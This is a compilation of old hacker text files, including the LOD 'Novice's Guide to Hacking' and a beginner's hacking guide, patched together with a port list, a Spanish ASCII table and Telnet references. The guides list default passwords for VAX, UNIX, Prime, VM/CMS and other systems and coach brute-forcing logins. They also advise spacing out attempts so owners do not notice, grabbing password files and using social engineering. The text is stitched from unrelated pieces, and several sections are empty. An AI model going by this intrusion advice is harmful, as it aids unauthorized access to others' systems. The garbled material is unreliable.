	The VAX system runs the VMS (Virtual Memory System) operating system. You know that you have a VAX system when you get a "username" prompt. Type in capital letters, this seems to be standard on VAX's. Type "HELP" and it gives you all of the help that you could possibly want. Here are the default usernames and passwords for VAX's:
Username:				Password:
SYSTEM				OPERATOR
SYSTEM				MANAGER
SYSTEM				SYSTEM
SYSTEM				SYSLIB
OPERATOR				OPERATOR
SYSTEST				UETP
SYSTEST				SYSTEST
SYSTEST				TEST
SYSMAINT				SYSMAINT
SYSMAINT				SERVICE
SYSMAINT				DIGITAL
FIELD					FIELD
FIELD					SERVICE
GUEST					GUEST
GUEST					unpassworded
DEMO					DEMO
DEMO					unpassworded
TEST					TEST
DECNET				DECNET
		Here are some of the VAX/VMS commands:
Command:				Function:
HELP (H)				Gives help and list of commands.
TYPE (T)				View contents of a file.
RENAME (REN)			Change name of a file.
PURGE (PU)	 			Deletes old versions of a file.
PRINT (PR)				Prints a file.
DIRECTORY (DIR)			Shows list of files.
DIFFERENCES	(DIF)			Shows differences between files.
CREATE (CR)				Creates a file.
DELETE (DEL)			Deletes a file.
COPY (COP)				Copy a file to another.
CONTINUE (C)			Continues session.
		The password file on VAX's are available when you type in the command:
SYS$SYSTEM:SYSUAF.DAT
	The password file on most VAX's are usually not available to normal system users, but try it anyway. If the default logins don't work, use the same means of finding one as stated in Section J.
	Be VERY careful when hacking VAX's becuase they record every bad login attempt. They are sometimes considered one of the most secure systems. Because of this, I advise not to try hacking these until you are more advanced.
	But, when you are an advanced hacker, or if you are already an advanced hacker, I advise that you try a few passwords at a time and then wait and try a few more the next day and so on, because when the real user logs on it displays all of the bad login attempts.
L. Basic PRIME hacking
	PRIME computer systems greet you with "Primecon 18.23.05", or something like it, when you connect. You should type in capital letters on this system, too. Once you connect, it will usually just sit there. If this happens, type "LOGIN <USERNAME>". It should then ask you for your username and password. The default usernames and passwords are listed below:
Username:			Password:
PRIME				PRIME
PRIME				PRIMOS
PRIMOS			PRIMOS
PRIMOS			PRIME
PRIMOS_CS			PRIME
PRIMOS_CS			PRIMOS
PRIMENET			PRIMENET
SYSTEM			SYSTEM
SYSTEM			PRIME
SYSTEM			PRIMOS
NETLINK			NETLINK
TEST				TEST
GUEST				GUEST
GUEST1 			GUEST
	When you are inside the system, type "NETLINK" and it ahould give you alot of help. This system uses NUA's, too. I might print these in the next volume.
M. Password List

N. Connecting modems to different phone lines	 
III. REFERENCE
A. Hacking and phreaking WWW. sites
    
	Here is a list of some World Wide Web sites that contain hacking, phreaking, computer, virus, carding, security, etc. material:
Site Address:
http://www.outerlimits.net/lordsome/index.html (Hacker's Layer)
http://web2.airmail.net/km/hfiles/free.htm     (Hacker's Hideout)
http://resudox.net/bio/novell.html
http://www.louisville.edu/wrbake01/hack2.html
http://www.intersurf.com/~materva/files.html
http://hightop.nrl.navy.mil/rainbow.html
http://www.rit.edu/~jmb8902/hacking.html
http://www.spatz.com/pecos/index.html
http://pages.prodigy.com/FL/dtgz94a/files2.html
http://www.2600.com					(alt.2600)
http://att.net/dir800
http://draco.centerline.com:8080/~franl/crypto.html
http://everest.cs.ucdavis.edu/Security.html
http://ice-www.larc.nasa.gov/WWW/security.html
http://lOpht.com						(lOpht)
http://lOpht.com/~oblivion/IIRG.html
http://underground.org
http://www.alw.nih.gov/WWW/security.html
http://www.aspentec.com/~frzmtdb/fun/hacker.html
http://www.cis.ohi-state.edu/hypertext/faq/usenet/alt-2600-faq/faq.html
http://www.cs.tufts.ed/~mcable/cypher/alerts/alerts.html
http://www.engin.umich.edu/~jgotts/underground/boxes.html
http://www.etext.org/Zines
http://www.inderect.com/www/johnk/
http://www.mgmua.com/hackers/index.html
http://www.paranoia.com/mthreat
http://www.paranoia.com/astrostar/fringe.html
http://www.umcc.umich.edu/~doug/virus-faq.html
http://www.wired.com
B. Good hacking and phreaking text files
	All of these files are available by download from the Internet.
File Name:
A Novice's Guide To Hacking
Alt.2600 Hack Faq
The Hacker's Handbook
The Official Phreaker's Manual
Rainbow Books (Listed in Section D.)
The Hacker Crackdown
Computer Hackers: Rebels With A Cause
The Legion Of Doom Technical Journals
The Ultimate Beginner's Guide To Hacking And Phreaking (Of course!)
C. Hacking and phreaking Newsgroups
alt.2600
alt.2600.hope.tech
alt.cellular
alt.cellular-phone-tech
alt.comp.virus
alt.cracks
alt.cyberpunk
alt.cyberspace
alt.dcom.telecom
alt.fan.lewiz
alt.hackers
alt.hackintosh
alt.hackers.malicious
alt.security
D. Rainbow Books

H. Hacking and phreaking Ftp sites
Address:
2600.com
agl.gatech.edu/pub
asylum.sf.ca.us
clark.net/pub/jcase
ftp.armory.com/pub/user/kmartind
ftp.armory.com/pub/user/swallow
ftp.fc.net/pub/defcon/BBEEP
ftp.fc.net/pub/phrack
ftp.giga.or.at/pub/hacker
ftp.lava.net/users/oracle
ftp.microserve.net/ppp-pop/strata/mac
ftp.near.net/security/archives/phrack
ftp.netcom.com/pub/br/bradelym
ftp.netcom.com/pub/daemon9
ftp.netcom.com/pub/zz/zzyzx
ftp.primenet.com/users/k/kludge

Añado una lista de puertos,  la de la Super guía del hacker by Nobody 

    echo                  7/tcp
    echo                  7/udp
    discard               9/tcp      sink null
    discard               9/udp    sink null
    systat               11/tcp
    systat               11/tcp    users
    daytime              13/tcp
    daytime              13/udp
    netstat              15/tcp
    qotd                 17/tcp    quote
    qotd                 17/udp  quote
    chargen              19/tcp    ttytst source
    chargen              19/udp  ttytst source
    ftp-data             20/tcp
    ftp                  21/tcp

    telnet               23/tcp
    smtp                 25/tcp    mail
    time                 37/tcp    timserver
    time                 37/udp  timserver
    rlp     39/udp  resource      # resource location
    name                42/tcp    nameserver
    name                42/udp  nameserver
    whois   43/tcp    nicname       # usually to sri-nic
    domain  53/tcp   nameserver    # name-domain server
    domain              53/udp nameserver
    nameserver 53/tcp   domain        # name-domain server
    nameserver     53/udp domain
    mtp                   57/tcp	      # deprecated
    bootp     67/udp                  # boot program server
    tftp                  69/udp
    rje                  77/tcp    netrjs
    finger               79/tcp
    link                 87/tcp    ttylink
    supdup               95/tcp
  hostnames 101/tcp    hostname      # usually from sri-nic
    iso-tsap           102/tcp
    dictionary         103/tcp    webster
    x400               103/tcp                             # ISO Mail
    x400-snd           104/tcp
    csnet-ns           105/tcp
    pop                109/tcp    postoffice
    pop2               109/tcp                  # Post Office
    pop3               110/tcp    postoffice
    portmap            111/tcp
    portmap            111/udp
    sunrpc             111/tcp
    sunrpc             111/udp
    auth               113/tcp    authentication
    sftp               115/tcp
    path               117/tcp
    uucp-path          117/tcp
    nntp             119/tcp    usenet        # Network News Transfer
    ntp         123/udp    ntpd ntp      # network time protocol (exp)
    nbname            137/udp
    nbdatagram        138/udp
    nbsession         139/tcp
    NeWS              144/tcp    news
    sgmp              153/udp    sgmp
    tcprepo           158/tcp    repository    # PCMAIL
    snmp              161/udp    snmp
    snmp-trap         162/udp    snmp
    print-srv         170/tcp                  # network PostScript
    vmnet             175/tcp
    load              315/udp
    vmnet0            400/tcp
    sytek             500/udp
    biff              512/udp    comsat
    exec              512/tcp
    login             513/tcp
    who               513/udp    whod
    shell             514/tcp    cmd           # no passwords used
    syslog            514/udp
    printer           515/tcp    spooler       # line printer spooler
    talk              517/udp
    ntalk             518/udp
    efs               520/tcp                  # for LucasFilm
    route             520/udp    router routed
    timed             525/udp    timeserver
    tempo             526/tcp    newdate
    courier           530/tcp    rpc
    conference        531/tcp    chat
    rvd-control       531/udp    MIT disk
    netnews           532/tcp    readnews
    netwall    533/udp                 # -for emergency broadcasts
    uucp       540/tcp    uucpd        # uucp daemon
    klogin     543/tcp                 # Kerberos authenticated rlogin
    kshell     544/tcp    cmd          # and remote shell
    new-rwho   550/udp    new-who      # experimental
    remotefs   556/tcp    rfs_server rfs# Brunhoff remote filesystem
    rmonitor   560/udp    rmonitord     # experimental
    monitor    561/udp                  # experimental
    garcon     600/tcp
    maitrd     601/tcp
    busboy     602/tcp
    acctmaster 700/udp
    acctslave  701/udp
    acct       702/udp
    acctlogin  703/udp
    acctprinter     704/udp
    elcsd           704/udp                  # errlog
    acctinfo        705/udp
    acctslave2      706/udp
    acctdisk        707/udp
    kerberos   750/tcp    kdc          # Kerberos authentication--tcp
    kerberos   750/udp    kdc          # Kerberos authentication--udp
    kerberos_master   751/tcp         # Kerberos authentication
    kerberos_master   751/udp         # Kerberos authentication
    passwd_server      752/udp        # Kerberos passwd server
    userreg_server      753/udp         # Kerberos userreg server
    krb_prop             754/tcp     # Kerberos slave propagation
    erlogin      888/tcp             # Login and environment passing
    kpop       1109/tcp                 # Pop with Kerberos
    phone      1167/udp
    ingreslock              1524/tcp
    maze                       1666/udp
    nfs        2049/udp                  # sun nfs
    knetd      2053/tcp                  # Kerberos de-multiplexor
    eklogin    2105/tcp                  # Kerberos encrypted rlogin
    rmt                  5555/tcp    rmtd
    mtb                  5556/tcp    mtbd          # mtb backup
    man                  9535/tcp                  # remote man server
    w                            9536/tcp
    mantst     9537/tcp                  # remote man server, testing
    bnews                  10000/tcp
    rscs0                    10000/udp
    queue                   10001/tcp
    rscs1                    10001/udp
    poker                    10002/tcp
    rscs2                    10002/udp
    gateway               10003/tcp
    rscs3                    10003/udp
    remp                     10004/tcp
    rscs4                   10004/udp
    rscs5                   10005/udp
    rscs6                   10006/udp
    rscs7                   10007/udp
    rscs8                   10008/udp
    rscs9                   10009/udp
    rscsa                   10010/udp
    rscsb                   10011/udp
    qmaster              10012/tcp
    qmaster              10012/udp

++++++++++++++++++++++++++++++++++++++
           |              The LOD/H Presents               |
\        A Novice's Guide to Hacking- 1989 edition         /
  \  ===============================         /
   \                             by                                 /
    \                     The Mentor                           /
     \       Legion of Doom/Legion of Hackers          /
       \                  December, 1988                   /
        \       Merry Christmas Everyone!              /
this prompt, what the hell is it?
   I'm *NOT* going to attempt to tell you what to do once you're inside of
any of these operating systems.  Each one is worth several G-files in its
own right.  I'm going to tell you how to identify and recognize certain
OpSystems, how to approach hacking into them, and how to deal with something
that you've never seen before and have know idea what it is.


VMS-       The VAX computer is made by Digital Equipment Corporation (DEC),
           and runs the VMS (Virtual Memory System) operating system.
           VMS is characterized by the 'Username:' prompt.  It will not tell
           you if you've entered a valid username or not, and will disconnect
           you after three bad login attempts.  It also keeps track of all
           failed login attempts and informs the owner of the account next time
           s/he logs in how many bad login attempts were made on the account.
           It is one of the most secure operating systems around from the
           outside, but once you're in there are many things that you can do
           to circumvent system security.  The VAX also has the best set of
           help files in the world.  Just type HELP and read to your heart's
           content.
           Common Accounts/Defaults:  [username: password [[,password]] ]
           SYSTEM:     OPERATOR or MANAGER or SYSTEM or SYSLIB
           OPERATOR:   OPERATOR
           SYSTEST:    UETP
           SYSMAINT:   SYSMAINT or SERVICE or DIGITAL
           FIELD:      FIELD or SERVICE
           GUEST:      GUEST or unpassworded
           DEMO:       DEMO  or unpassworded
           DECNET:     DECNET


DEC-10-    An earlier line of DEC computer equipment, running the TOPS-10
           operating system.  These machines are recognized by their
           '.' prompt.  The DEC-10/20 series are remarkably hacker-friendly,
           allowing you to enter several important commands without ever
           logging into the system.  Accounts are in the format [xxx,yyy] where
           xxx and yyy are integers.  You can get a listing of the accounts and
           the process names of everyone on the system before logging in with
           the command .systat (for SYstem STATus).  If you seen an account
           that reads [234,1001]   BOB JONES, it might be wise to try BOB or
           JONES or both for a password on this account.  To login, you type
           .login xxx,yyy  and then type the password when prompted for it.
           The system will allow you unlimited tries at an account, and does
           not keep records of bad login attempts.  It will also inform you
           if the UIC you're trying (UIC = User Identification Code, 1,2 for
           example) is bad.
           Common Accounts/Defaults:
           1,2:        SYSLIB or OPERATOR or MANAGER
           2,7:        MAINTAIN
           5,30:       GAMES

UNIX-      There are dozens of different machines out there that run UNIX.
           While some might argue it isn't the best operating system in the
           world, it is certainly the most widely used.  A UNIX system will
           usually have a prompt like 'login:' in lower case.  UNIX also
           will give you unlimited shots at logging in (in most cases), and
           there is usually no log kept of bad attempts.
           Common Accounts/Defaults: (note that some systems are case
           sensitive, so use lower case as a general rule.  Also, many times
           the accounts will be unpassworded, you'll just drop right in!)
           root:       root
           admin:      admin
           sysadmin:   sysadmin or admin
           unix:       unix
           uucp:       uucp
           rje:        rje
           guest:      guest
           demo:       demo
           daemon:     daemon
           sysbin:     sysbin

Prime-     Prime computer company's mainframe running the Primos operating
           system.  The are easy to spot, as the greet you with
           'Primecon 18.23.05' or the like, depending on the version of the
           operating system you run into.  There will usually be no prompt
           offered, it will just look like it's sitting there.  At this point,
           type 'login <username>'.  If it is a pre-18.00.00 version of Primos,
           you can hit a bunch of ^C's for the password and you'll drop in.
           Unfortunately, most people are running versions 19+.  Primos also
           comes with a good set of help files.  One of the most useful
           features of a Prime on Telenet is a facility called NETLINK.  Once
           you're inside, type NETLINK and follow the help files.  This allows
           you to connect to NUA's all over the world using the 'nc' command.
           For example, to connect to NUA 026245890040004, you would type
           @nc :26245890040004 at the netlink prompt.
           Common Accounts/Defaults:
           PRIME       PRIME or PRIMOS
           PRIMOS_CS   PRIME or PRIMOS
           PRIMENET    PRIMENET
           SYSTEM      SYSTEM or PRIME
           NETLINK     NETLINK
           TEST        TEST
           GUEST       GUEST
           GUEST1      GUEST

HP-x000-   This system is made by Hewlett-Packard.  It is characterized by the
           ':' prompt.  The HP has one of the more complicated login sequences
           around- you type 'HELLO SESSION NAME,USERNAME,ACCOUNTNAME,GROUP'.
           Fortunately, some of these fields can be left blank in many cases.
           Since any and all of these fields can be passworded, this is not
           the easiest system to get into, except for the fact that there are
           usually some unpassworded accounts around.  In general, if the
           defaults don't work, you'll have to brute force it using the
           common password list (see below.)  The HP-x000 runs the MPE operat-
           ing system, the prompt for it will be a ':', just like the logon
           prompt.
           Common Accounts/Defaults:
           MGR.TELESUP,PUB                      User: MGR Acct: HPONLY Grp: PUB
           MGR.HPOFFICE,PUB                     unpassworded
           MANAGER.ITF3000,PUB                  unpassworded
           FIELD.SUPPORT,PUB                    user: FLD,  others unpassworded
           MAIL.TELESUP,PUB                     user: MAIL, others 
unpassworded 
           MGR.RJE                              unpassworded
           FIELD.HPPl89 ,HPPl87,HPPl89,HPPl96   unpassworded
           MGR.TELESUP,PUB,HPONLY,HP3           unpassworded


IRIS-      IRIS stands for Interactive Real Time Information System.  It orig-
           inally ran on PDP-11's, but now runs on many other minis.  You can
           spot an IRIS by the 'Welcome to "IRIS" R9.1.4 Timesharing' banner,
           and the ACCOUNT ID? prompt.  IRIS allows unlimited tries at hacking
           in, and keeps no logs of bad attempts.  I don't know any default
           passwords, so just try the common ones from the password database
           below.
           Common Accounts:
           MANAGER
           BOSS
           SOFTWARE
           DEMO
           PDP8
           PDP11
           ACCOUNTING

VM/CMS-    The VM/CMS operating system runs in International Business Machines
           (IBM) mainframes.  When you connect to one of these, you will get
           message similar to 'VM/370 ONLINE', and then give you a '.' prompt,
           just like TOPS-10 does.  To login, you type 'LOGON <username>'.
           Common Accounts/Defaults are:
           AUTOLOG1:            AUTOLOG or AUTOLOG1
           CMS:                 CMS
           CMSBATCH:            CMS or CMSBATCH
           EREP:                EREP
           MAINT:               MAINT or MAINTAIN
           OPERATNS:            OPERATNS or OPERATOR
           OPERATOR:            OPERATOR
           RSCS:                RSCS
           SMART:               SMART
           SNA:                 SNA
           VMTEST:              VMTEST
           VMUTIL:              VMUTIL
           VTAM:                VTAM

NOS-       NOS stands for Networking Operating System, and runs on the Cyber
           computer made by Control Data Corporation.  NOS identifies itself
           quite readily, with a banner of 'WELCOME TO THE NOS SOFTWARE
           SYSTEM.  COPYRIGHT CONTROL DATA 1978,1987'.  The first prompt you
           will get will be FAMILY:.  Just hit return here.  Then you'll get
           a USER NAME: prompt.  Usernames are typically 7 alpha-numerics
           characters long, and are *extremely* site dependent. Operator
           accounts begin with a digit, such as 7ETPDOC.
           Common Accounts/Defaults:
           $SYSTEM              unknown
           SYSTEMV              unknown

Decserver- This is not truly a computer system, but is a network server that
           has many different machines available from it.  A Decserver will
           say 'Enter Username>' when you first connect.  This can be anything,
           it doesn't matter, it's just an identifier.  Type 'c', as this is
           the least conspicuous thing to enter.  It will then present you
           with a 'Local>' prompt.  From here, you type 'c <systemname>' to
           connect to a system.  To get a list of system names, type
           'sh services' or 'sh nodes'.  If you have any problems, online
           help is available with the 'help' command.  Be sure and look for
           services named 'MODEM' or 'DIAL' or something similar, these are
           often outdial modems and can be useful!

GS/1-      Another type of network server.  Unlike a Decserver, you can't
           predict what prompt a GS/1 gateway is going to give you.  The
           default prompt it 'GS/1>', but this is redifinable by the
           system administrator.  To test for a GS/1, do a 'sh d'.  If that
           prints out a large list of defaults (terminal speed, prompt,
           parity, etc...), you are on a GS/1.  You connect in the same manner
           as a Decserver, typing 'c <systemname>'.  To find out what systems
           are available, do a 'sh n' or a 'sh c'.  Another trick is to do a
           'sh m', which will sometimes show you a list of macros for logging
           onto a system.  If there is a macro named VAX, for instance, type
           'do VAX'.

           The above are the main system types in use today.  There are 
           hundreds of minor variants on the above, but this should be
           enough to get you started.
          
Unresponsive Systems
~~~~~~~~~~~~~~~~~~~~
   Occasionally you will connect to a system that will do nothing but sit
there.  This is a frustrating feeling, but a methodical approach to the system
will yield a response if you take your time.  The following list will usually
make *something* happen.
1)  Change your parity, data length, and stop bits.  A system that won't re-
    spond at 8N1 may react at 7E1 or 8E2 or 7S2.  If you don't have a term
    program that will let you set parity to EVEN, ODD, SPACE, MARK, and NONE,
    with data length of 7 or 8, and 1 or 2 stop bits, go out and buy one. 
    While having a good term program isn't absolutely necessary, it sure is
    helpful.
2)  Change baud rates.  Again, if your term program will let you choose odd
    baud rates such as 600 or 1100, you will occasionally be able to penetrate
    some very interesting systems, as most systems that depend on a strange
    baud rate seem to think that this is all the security they need...
3)  Send a series of <cr>'s.
4)  Send a hard break followed by a <cr>.
5)  Type a series of .'s (periods).  The Canadian network Datapac responds
    to this.
6)  If you're getting garbage, hit an 'i'.  Tymnet responds to this, as does
    a MultiLink II.
7)  Begin sending control characters, starting with ^A --> ^Z.
8)  Change terminal emulations.  What your vt100 emulation thinks is garbage
    may all of a sudden become crystal clear using ADM-5 emulation.  This also
    relates to how good your term program is.
9)  Type LOGIN, HELLO, LOG, ATTACH, CONNECT, START, RUN, BEGIN, LOGON, GO,
    JOIN, HELP, and anything else you can think of.
10) If it's a dialin, call the numbers around it and see if a company
    answers.  If they do, try some social engineering.

Brute Force Hacking
~~~~~~~~~~~~~~~~~~~
   There will also be many occasions when the default passwords will not work
on an account.  At this point, you can either go onto the next system on your
list, or you can try to 'brute-force' your way in by trying a large database
of passwords on that one account.  Be careful, though!  This works fine on
systems that don't keep track of invalid logins, but on a system like a VMS,
someone is going to have a heart attack if they come back and see '600 Bad
Login Attempts Since Last Session' on their account.  There are also some
operating systems that disconnect after 'x' number of invalid login attempts
and refuse to allow any more attempts for one hour, or ten minutes, or some-
times until the next day.
   The following list is taken from my own password database plus the data-
base of passwords that was used in the Internet UNIX Worm that was running
around in November of 1988.  For a shorter group, try first names, computer
terms, and obvious things like 'secret', 'password', 'open', and the name
of the account.  Also try the name of the company that owns the computer
system (if known), the company initials, and things relating to the products
the company makes or deals with.



Part Four: Wrapping it up!
~~~~~~~~~~~~~~~~~~~~~~~~~~
   I hope this file has been of some help in getting started.  If you're
asking yourself the question 'Why hack?', then you've probably wasted a lot
of time reading this, as you'll never understand.  For those of you who
have read this and found it useful, please send a tax-deductible donation
of $5.00 (or more!) in the name of the Legion of Doom to:
                                       The American Cancer Society
                                       90 Park Avenue
                                       New York, NY  10016



********************************************************************************
References:
1) Introduction to ItaPAC by Blade Runner
   Telecom Security Bulletin #1
2) The IBM VM/CMS Operating System by Lex Luthor
   The LOD/H Technical Journal #2
3) Hacking the IRIS Operating System by The Leftist
   The LOD/H Technical Journal #3
4) Hacking CDC's Cyber by Phrozen Ghost
   Phrack Inc. Newsletter #18
5) USENET comp.risks digest (various authors, various issues)
6) USENET unix.wizards forum (various authors)
7) USENET info-vax forum (various authors)

Recommended Reading:
1) Hackers by Steven Levy
2) Out of the Inner Circle by Bill Landreth
3) Turing's Man by J. David Bolter
4) Soul of a New Machine by Tracy Kidder
5) Neuromancer, Count Zero, Mona Lisa Overdrive, and Burning Chrome, all
   by William Gibson
6) Realit


REFERENCES

[RFC768] Postel, J., "User Datagram Protocol", STD 6, RFC 768,
         USC/Information Sciences Institute, August 1980.

[RFC793] Postel, J., ed., "Transmission Control Protocol - DARPA
         Internet Program Protocol Specification", STD 7, RFC 793,
         USC/Information Sciences Institute, September 1981.

Apendice - Tabla ASCII 
BINARY     MEANING 
00000000   Nulo 
10000000   Comienzo del Mensaje 
01000000   Final de Direccion 
11000000   Fin del Mensaje 
00100000   Fin de transmision 
10100000   Quien coño eres? (WRU Who are you?) 
01100000   Eres ...  (RU Are you...?) 
11100000   Campana (Señal auditiva) 
00010000   Formato 
10010000   Tabulacion Horizontal 
01010000   Pasar una linea (Line Feed) 
11010000   Tabulacion Vertical 
00110000   Pasar una hoja (Form Feed) 
10110000   Intro o retorno de carro (Carriage return) 
01110000   Mayusculas fuera (Shift out) 
11110000   Mayusculas dentro (Shift in) 
00001000   Device control reserved for data link escape 
10001000   Device control 
01001000   Device Control 
11001000   Device Control 
00101000   Device control (stop) 
10101000   Error 
01101000   Espera asincrona 
11101000   Fin logico del medio o dispositivo 
10001000   Separador de informacion 
10011000   Separador de informacion 
01011000   Separador de informacion 
11011000   Separador de informacion 
11001000   Separador de informacion 
11011000   Separador de informacion 
11101000   Separador de informacion 
11111000   Separador de informacion 
00000100   Espacio 
10000100   ! 
01000100   " 
11000100   # 
00100100   $ 
10100100   % 
01100100   & 
01110100   ' 
00010100   ( 
10010100   ) 
01010100   * 
11010100   + 
00110100   , 
10110100   - 
01110100   . 
11110100   / 
00001100   0 
10001100   1 
01001100   2 
11001100   3 
00101100   4 
10101100   5 
01101100   6 
11101100   7 
00011100   8 
10011100   9 
01011100   : 
11011100   ; 
00111100   < 
10111100   = 
01111100   > 
11111100   ? 
00000010   @ 
10000010   A 
01000010   B 
11000010   C 
00100010   D 
10100010   E 
01100010   F 
11100010   G 
00010010   H 
10010010   I 
01010010   J 
11010010   K 
00110010   L 
10110010   M 
01110010   N 
11110010   O 
00001010   P 
10001010   Q 
01001010   R 
11001010   S 
00101010   T 
10101010   U 
01101010   V 
11101010   W 
00011010   X 
10011010   Y 
01011010   Z 
11011010   Corchete Izquierdo 
00111010   Slash 
10111010   Corchete Derecho 
01111010   Flecha Arriba 
11111010   Flecha Izquierda 
00000110   Unassigned 
10000110   Unassigned 
01000110   Unassigned 
11000110   Unassigned 
00100110   Unassigned 
10100110   Unassigned 
01100110   Unassigned 
11100110   Unassigned 
00010110   Unassigned 
10010110   Unassigned 
01010110   Unassigned 
11010110   Unassigned 
00110110   Unassigned 
10110110   Unassigned 
01110110   Unassigned 
11110110   Unassigned 
00001110   Unassigned 
10001110   Unassigned 
01001110   Unassigned 
11001110   Unassigned 
00101110   Unassigned 
10101110   Unassigned 
01101110   Unassigned 
11101110   Unassigned 
00011110   Unassigned 
10011110   Unassigned 
01011110   Unassigned 
11011110   Unassigned 
00111110   Peticion 
10111110   Unassigned control 
01111110   Escape 
11111110   Borrado / Espera
Resources
Sendmail Bug Exploits List. Explains methods of attacking sendmail. Some of these techniques use Telnet as the base application. 

http://www.crossroads.fi/~tkantola/hack/unix/sendmail.txt 
Improving the Security of Your Site by Breaking Into It. Dan Farmer and Wietse Venema. 

http://stos-www.cit.cornell.edu/Mark_html/Satan_html/docs/admin_guide_to_cracking.html 
The Telnet Protocol Specification (RFC 854). J. Postel and J. Reynolds. May 1983. 

http://sunsite.auc.dk/RFC/rfc/rfc854.html 
The Telnet Environment Option (RFC 1408). D. Borman, Editor. Cray Research, Inc. January 1993. 

http://sunsite.auc.dk/RFC/rfc/rfc1408.html 
Telnet Environment Option (RFC 1572). S. Alexander. 

ftp://ds.internic.net/rfc/rfc1572.txt 
Telnet Authentication: SPX (RFC 1412). K. Alagappan. 

ftp://ds.internic.net/rfc/rfc1412.txt 
Telnet Remote Flow Control Option. (RFC 1372). C. Hedrick and D. Borman. 

ftp://ds.internic.net/rfc/rfc1372.txt 
Telnet Linemode Option (RFC 1184). D.A. Borman. 

ftp://ds.internic.net/rfc/rfc1184.txt 
The Q Method of Implementing Telnet Option Negotiation (RFC 1143). D.J. Bernstein. 

ftp://ds.internic.net/rfc/rfc1143.txt 
Telnet X Display Location Option (RFC 1096). G.A. Marcy. 

ftp://ds.internic.net/rfc/rfc1096.txt 
Telnet Binary Transmission (RFC 856). J. Postel and J.K. Reynolds. 

ftp://ds.internic.net/rfc/rfc856.txt 
Remote User Telnet Service (RFC 818). J. Postel. 

ftp://ds.internic.net/rfc/rfc818.txt 
Discussion of Telnet Protocol (RFC 139). T.C. O'Sullivan. Unfortunately, this RFC is no longer available online.

First Cut at a Proposed Telnet Protocol (RFC 97). J.T. Melvin and R.W. Watson. Unfortunately, this RFC is no longer available online.

The Telnet Authentication Option. Internet Engineering Task Force Internet Draft. Telnet Working Group. D. Borman, Editor. Cray Research, Inc. February 1991. 

http://web.dementia.org/~shadow/telnet/preliminary-draft-borman-telnet-authentication-00.html 
Telnet Authentication: Kerberos Version 4 (RFC 1411). D. Borman, Editor. Cray Research, Inc. January 1993. 

ftp://ds.internic.net/rfc/rfc1411.txt 
STEL: Secure Telnet. Encryption-enabled Telnet. David Vincenzetti, Stefano Taino, and Fabio Bolognesi. 

http://idea.sec.dsi.unimi.it/stel.html 
Session-Layer Encryption. Matt Blaze and Steve Bellovin. Proceedings of the Usenix Security Workshop, June 1995.

Attaching Non-TCP-IP Devices with Telnet. Stefan C. Johnson. Sys Admin: The Journal for UNIX Systems Administrators. June 1996.

Secure RPC Authentication (SRA) for Telnet and FTP. David K. Hess, David R. Safford, and Douglas Lee Schales. Proceedings of the Fourth Usenix Security Symposium, Supercomputer Center, Texas A&M University, 1993.

Internetworking with TCP/IP Vol. 1: Principles, Protocols and Architecture. Douglas Comer. Prentice Hall. 1991. 

http://www.pcmag.com/issues/1606/pcmg0050.htm 
Terminal Hopping. Karen Bannan. PC Magazine's InternetUser--CRT, Version 1.1.4 (01/30/97). 

http://www.pcmag.com/iu/util/telnet/vdcrt114.htm 
Telnet & Terminal Emulation. PC Magazine's InternetUser. January 30, 1997. 


http://www.pcmag.com/iu/roundup/ru970130.htm 
EFF's (Extended) Guide to the Internet--Telnet. Adam Gaffin. Mining the Net, Part I. 

http://cuiwww.unige.ch/eao/www/Internet/Extended.Guide/eeg_93.html



1